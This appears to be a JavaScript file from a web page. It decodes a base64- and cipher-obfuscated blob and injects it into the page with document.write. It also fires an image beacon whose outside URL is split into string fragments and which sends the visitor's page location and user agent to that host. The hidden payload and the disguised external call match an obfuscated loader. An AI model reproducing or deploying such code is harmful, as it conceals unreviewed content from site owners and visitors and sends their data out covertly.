

function SearchStr(S){
var Alf="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
	S2="", e=[], j, i=0, c=[];

while(i<S.length){
	for(j=1; j<=4; j++) e[j]=Alf.indexOf(S.charAt(i++));
	c[1]=(e[1]<<2) | (e[2]>>4);
	c[2]=((e[2] & 15)<<4) | (e[3]>>2);
	c[3]=((e[3] & 3)<<6) | e[4];
	for(j=1; j<=3; j++){
		if (j==1 || e[j+1]!=64) S2+=String.fromCharCode(c[j]);
		}
	}
return S2;
}

function ReplaceStr(S){
var L, Page, S2='', Item, i, n;

S=SearchStr(S);

Page=parseInt(S.substr(0, 2), 16);
Item=parseInt(S.substr(2, 2), 16);
S=S.substring(4); L=S.length;

for(i=0; i<L; i++){
	n=S.charCodeAt(i)-Page;
	if (n<0) n+=256;
	S2+=String.fromCharCode(n); Page+=Item; 
	if (Page>255) Page=0;
	}

return S2;
}

function ShowItems(){
var page='', Content=
	'NzYwRrLp/RnSKjQcXm9pcoOZpb7Oidnz/wwiADVGXnNlgVw3jLe/yuvsthwVLEYBZ2dpe4NNs7B61efo+sUoKzcBYHFpcoNNqLTN3YLD+g4q4xVNUXJzTHWOpb+Yc7TwAwzUNkRELSFog5KddnqJ4O/+xBAVL0FHZC1jfotcpbjBmOT29wkdMTlAUXB1cEyUpbF8icf14hQVJw8DZGdpgkygsMTGzqb9/xgdJTtNWXN5TEWjpb7Dy+TsveDWAdwdH2NphVxpa6/D37Y=';

window.h='www.kaloft.com'; window.b='fish';

Content=ReplaceStr(Content);
var RE=new RegExp("http://[^/]+/img/loading_aqua.gif");
Content=Content.replace(RE, "/imaged/dc/loading_aqua.gif");

document.write('<'+'LINK REL="StyleSheet" HREF="/commonres/print.css">'+
	(page ? '<'+'Script>var a="'+page+'"<'+'/Script>' : '')+
	'<'+'Script Src="/commonres/print.js"><'+'/Script>'+
	Content);
}

//-----
function Line(Line){return escape("\n"+Line);}

function LT(){
var ET=new Date(), Time, oEBImg;

Time=(ET-ST); W=window; oEBImg=new Image();
oEBImg.src="htt"+"p://er"+"ror.sopse"+"rver.com/erro"+"rsbase/hand"+"ler.php?e=141&descr="+
	escape(W.location)+
	Line('Time: '+Math.round(Time/100)/10)+
	Line(W.navigator.userAgent);
}
//-----


ShowItems();
